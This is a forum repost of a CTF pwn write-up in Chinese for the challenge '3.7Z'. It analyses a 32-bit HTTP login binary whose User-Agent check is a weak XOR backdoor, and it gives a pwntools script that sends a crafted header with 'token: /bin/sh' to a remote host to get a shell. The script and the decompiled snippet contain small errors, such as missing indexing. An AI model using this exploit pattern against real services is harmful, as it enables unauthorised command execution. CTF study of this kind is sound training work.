本帖最后由 Xor0ne 于 2020-3-31 16:27 编辑
3.7Z
来源于:I春秋
题目内容:nc 106.75.2.53 80附件下载:
Writeup
来源于:https://www.ichunqiu.com/writeup/detail/525
- ➜ workspace file http
- http: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=e013437b38841afd4ac166fcba1a25b553ba9028, stripped
- ➜ workspace checksec http
- [*] '/Users/apple/Binary/CTF/Shooting/ichun/Pwn/3.7Z/workspace/http'
- Arch: i386-32-little
- RELRO: Partial RELRO
- Stack: Canary found
- NX: NX enabled
- PIE: No PIE (0x8048000)
比较容易的题目,题目是一个HTTP的登陆程序
我们输入HTTP报文,其中函数USER-Agent:之后的内容通过judge函数判断,即可执行“token”下的命令 而judge函数是一个很简单的亦或加密,存在弱密钥,也就是一个直接得到shellbackdoor。
signed int __cdecl judge(int a1) { signed int i; // [esp+18h] [ebp-10h] signed int v3; // [esp+1Ch] [ebp-Ch] v3 = strlen(s); for ( i = 0; i < v3; ++i ) { if ( (i ^ *(char *)(i + a1)) != s ) return 0; } return 1;
}
当然还存在格式化字符等漏洞,我们直接利用弱密钥,将构造好的HTTP报文加上我们想要想要执行的命令注入即可。
#/usr/env/bin python
from pwn import *
context.binary = './http'
context.terminal = ['tmux','sp','-h']
context.log_level = 'debug'
def login(data):
payload = ''
for i in range(len(data)):
payload += chr(i^ord(data))
return payload
io = process('./http')
io = remote( '106.75.93.221' ,80)
payload = 'User-Agent: '+login('useragent')
print payload
payload += 'token: '+'/bin/sh'
payload += '\r\n\r\n'
io.send(payload)
io.interactive()
| 
发表于 2020-3-31 16:20:45